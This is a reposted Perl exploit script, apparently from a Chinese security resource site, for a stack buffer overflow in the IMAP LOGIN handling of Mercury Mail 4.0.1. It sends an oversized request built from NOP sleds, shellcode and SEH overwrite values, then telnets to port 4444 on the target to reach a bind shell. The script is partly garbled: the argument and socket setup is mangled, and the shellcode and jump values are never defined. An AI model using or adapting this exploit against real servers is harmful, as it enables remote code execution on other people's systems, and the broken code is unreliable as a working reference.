Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

2023-12-04 0 908

#!/usr/bin/perl

#

# http://www.securityfocus.com/bid/11775

# credit to Muts for this vulnerability

# acaro [at] jervus.it

use IO::Socket::INET;

use Switch;

if (@ARGV new(proto=>\’tcp\’, PeerAddr=>$host, PeerPort=>$port);

$socket or die "Cannot connect to host!\\n";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

send $socket, $request, 0;

print "[ ] Sent 1st request\\n";

recv($socket, $reply, 1024, 0);

print "Response:" . $reply;

sleep(1);

my $request ="\\x41" x 255;

send $socket, $request, 0;

print "[ ] Sent 2nd request\\n";

sleep(1);

my $request=("\\x45" x7420).("\\x90" x10).$happy.("\\x90" x14).$shellcode.("\\x41" x8).$nextseh.$seh.("\\x90" x5).$jmp.("\\x90" x533);

send $socket, $request, 0;

print "[ ] Sent final request\\n";

sleep(1);

close($socket);

print " connect on port 4444 of $host …\\n";

sleep(3);

system("telnet $host 4444");

exit;

//http://www.leftworld.net

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit https://www.u-9.cn/security/exploit/71829.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务